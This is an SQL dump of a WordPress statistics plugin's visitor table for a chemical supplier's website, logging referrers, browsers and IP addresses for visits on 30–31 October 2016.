INSERT INTO `wp_statistics_visitor` VALUES (13813, '2016-10-30', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiAxJ-zgYPQAhVU12MKHWZPCZYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw', 'MSIE', 'Windows', '11.0', '', '24.10.168.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13814, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '192.3.112.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13815, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '31.14.16.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13816, '2016-10-30', 'https://www.google.ru/', 'Safari', 'Macintosh', '10.0', '', '195.135.238.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13817, '2016-10-30', 'https://google.com', 'Firefox', 'Windows', '49.0', '', '84.183.104.143', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13818, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '212.29.135.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13819, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '195.154.122.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13820, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.213.116.228', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13821, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '206.41.175.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13822, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '138.201.59.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13823, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13824, '2016-10-30', 'https://www.miller-stephenson.com/product/conformal-coating-stripper/', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13825, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '187.190.159.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13826, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '125.88.204.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13827, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '125.88.204.178', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13828, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.133.79.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13829, '2016-10-30', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.94.168.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13830, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.18.142.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13831, '2016-10-30', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.3', '', '73.175.31.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13832, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.157.160.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13833, '2016-10-30', 'https://www.miller-stephenson.com/product/epi-rez-3522-w-60/', 'Safari', 'iPhone', '7.0', '', '199.30.16.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13834, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '176.31.39.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13835, '2016-10-30', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13836, '2016-10-30', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiM7IXGs4PQAhXH64MKHfuLAk4QFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '161.69.22.122', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13837, '2016-10-30', 'https://www.miller-stephenson.com', 'Go--client', 'Unknown', '1.1', '', '185.28.193.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13838, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13839, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '93.72.174.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13840, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.207.144.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13841, '2016-10-30', 'https://www.google.com/', 'Chrome', 'Android', '54.0.2840.68', '', '24.15.92.121', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13842, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '116.4.136.41', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13843, '2016-10-30', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj9wo7OxoPQAhXHZX4KHRi3DNkYABAA&sig=AOD64_2PYNqc0CpzWfTdS9AAORgMoMvlGQ&rct=j&q=&ved=0ahUKEwjsn4rOxoPQAhVD3GMKHQDZAZ4Q0QwIHA&adurl=', 'Safari', 'Macintosh', '6.1.6', '', '73.14.11.94', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13844, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.227.17.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13845, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.0.10', '', '54.159.31.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13846, '2016-10-30', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13847, '2016-10-30', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '70.187.44.169', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13848, '2016-10-30', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.234.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13849, '2016-10-30', 'https://www.google.com/', 'Safari', 'Macintosh', '7.0.6', '', '148.74.43.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13850, '2016-10-30', 'https://us.wow.com/search?s_pt=aolsem&s_it=aolsem&s_chn=221&q=aero%20duster%20miller%20stephenson', 'Chrome', 'Windows', '54.0.2840.71', '', '76.27.197.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13851, '2016-10-30', 'https://www.bing.com/search?q=crazing+resistance+in+coatings&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13852, '2016-10-30', 'https://www.miller-stephenson.com/product/urethane-coating/', 'MSIE', 'Windows', '9.0', '', '204.79.180.221', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13853, '2016-10-30', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.60.60.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13854, '2016-10-30', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '157.55.2.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13855, '2016-10-31', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '7.0', '', '131.253.25.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13856, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.64.7.54', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13857, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Android', '49.0', '', '213.67.224.38', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13858, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '218.19.17.81', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13859, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '136.152.142.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13860, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '128.32.239.213', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13861, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '80.48.46.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13862, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.183.80.218', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13863, '2016-10-31', 'https://www.google.com.au/', 'Chrome', 'Windows', '45.0.2454.101', '', '203.6.69.2', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13864, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.6.69.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13865, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13866, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13867, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '191.101.92.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13868, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '191.101.92.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13869, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.109.226.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13870, '2016-10-31', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '76.238.202.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13871, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13872, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13873, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '73.68.65.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13874, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13875, '2016-10-31', 'https://www.google.com.hk/', 'Chrome', 'Windows', '48.0.2564.116', '', '123.114.205.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13876, '2016-10-31', 'https://www.google.com.hk/', 'MSIE', 'Windows', '9.0', '', '180.163.2.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13877, '2016-10-31', 'https://www.google.co.jp/', 'Chrome', 'Windows', '54.0.2840.71', '', '118.151.148.178', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13878, '2016-10-31', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13879, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13880, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13881, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '97.94.105.20', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13882, '2016-10-31', 'https://www.bing.com/search?q=miller-stephenson.com+msds+ms-143te&qs=n&form=QBRE&pq=miller-stephenson.com+msds+ms-143te&sc=0-35&sp=-1&sk=&cvid=B5FB4DB4BBCC410B822369CFBAC97AE4', 'MSIE', 'Windows', '11.0', '', '125.139.135.144', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13883, '2016-10-31', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13884, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13885, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '116.231.248.40', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13886, '2016-10-31', 'https://www.duba.com/?tn=56060048_4_pg&ch=12&wn=5', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.89.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13887, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13888, '2016-10-31', 'https://www.duba.com/?tn=56060048_4_pg&ch=12&wn=5', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.220', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13889, '2016-10-31', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '101.226.33.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13890, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13891, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13892, '2016-10-31', 'https://www.miller-stephenson.com/contact/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13893, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '101.226.33.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13894, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13895, '2016-10-31', 'https://www.miller-stephenson.com/articles/', 'MSIE', 'Windows', '9.0', '', '117.185.27.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13896, '2016-10-31', 'https://www.miller-stephenson.com/articles/', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13897, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.66.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13898, '2016-10-31', 'https://www.miller-stephenson.com/articles/', 'MSIE', 'Windows', '9.0', '', '101.226.68.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13899, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.206.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13900, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13901, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13902, '2016-10-31', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '113.185.57.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13903, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/epon-solid-epoxy-resins/', 'Chrome', 'Android', '53.0.2785.124', '', '113.185.57.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13904, '2016-10-31', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '101.226.66.193', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13905, '2016-10-31', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '101.226.65.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13906, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '180.153.214.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13907, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '101.226.51.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13908, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.240', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13909, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.66.177', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13910, '2016-10-31', 'https://www.miller-stephenson.com/epoxy-resin/', 'MSIE', 'Windows', '9.0', '', '101.226.125.104', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13911, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.66.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13912, '2016-10-31', 'https://www.miller-stephenson.com/epoxy-resin-conformal-coatings/', 'MSIE', 'Windows', '9.0', '', '101.226.66.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13913, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13914, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.66.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13915, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.205.254', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13916, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.89.119', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13917, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.66.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13918, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13919, '2016-10-31', 'https://www.miller-stephenson.com/?s=MS-383H&post_type=product#', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.206.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13920, '2016-10-31', 'https://www.miller-stephenson.com/?s=UV&post_type=product', 'MSIE', 'Windows', '9.0', '', '61.151.226.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13921, '2016-10-31', 'https://www.miller-stephenson.com/?s=MS-383H&post_type=product', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13922, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.66.172', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13923, '2016-10-31', 'https://www.miller-stephenson.com/military-spec-chemicals/', 'MSIE', 'Windows', '9.0', '', '101.226.51.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13924, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.51.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13925, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13926, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13927, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '23.0.1271.95', '', '54.91.16.247', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13928, '2016-10-31', 'https://ru-dety.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.95.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13929, '2016-10-31', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '36.0.1985.97', '', '185.143.230.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13930, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '185.143.230.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13931, '2016-10-31', 'https://storehouse.ua/', 'MSIE', 'Windows', '6.0', '', '46.119.118.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13932, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '22.0', '', '192.126.214.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13933, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.123.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13934, '2016-10-31', 'https://ttsgco.blogfa.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '104.247.220.251', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13935, '2016-10-31', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj5mv7QkITQAhWERl4KHSe0DtoYABAA&sig=AOD64_3aueJTjxKqlSi1sMl-2-0Nf9Fh_g&rct=j&q=&ved=0ahUKEwjm-_rQkITQAhUF2IMKHcjGCTwQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '209.221.23.34', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13936, '2016-10-31', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/product-tag/ptfe-release-agent/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwi6_5Gfk4TQAhUIurwKHWIuBk0QFggYMAE&usg=AFQjCNHxGyQNQDicFvs6tNO95ygKhKVjOA', 'MSIE', 'Windows', '9.0', '', '222.98.155.75', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13937, '2016-10-31', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwjR4-TGmYTQAhXGU7wKHRKMBVEQFghaMAY&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67-radical-initiator%2F&usg=AFQjCNF6JQqQTvTAJszhPay_5GmxN2I4Hw', 'MSIE', 'Windows', '11.0', '', '211.231.196.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13938, '2016-10-31', 'https://www.duba.com/?f=dbsj&db_99_42&up&jq=1&wn=3&hid=99_42_&ty3=0&tryno=1335&z=0', 'MSIE', 'Windows', '9.0', '', '101.226.33.206', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13939, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '101.226.33.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13940, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '195.154.225.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13941, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13942, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.169.188.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13943, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2062.124', '', '107.21.154.11', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13944, '2016-10-31', 'https://www.amt-k.ru/', 'MSIE', 'Windows', '6.0', '', '176.8.88.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13945, '2016-10-31', 'https://www.miller-stephenson.com/miller/adhesive_kits.html', 'MSIE', 'Windows', '9.0', '', '182.118.25.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13946, '2016-10-31', 'https://www.bing.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '104.33.234.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13947, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13948, '2016-10-31', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=41', 'MSIE', 'Windows', '9.0', '', '182.118.20.237', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13949, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera Next', 'Windows', '26.0.1656.60', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13950, '2016-10-31', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13951, '2016-10-31', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '188.212.22.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13952, '2016-10-31', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=51', 'MSIE', 'Windows', '9.0', '', '182.118.25.218', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13953, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '212.154.136.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13954, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13955, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '106.120.160.109', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (13956, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '106.120.161.68', '000', 2, 0); 
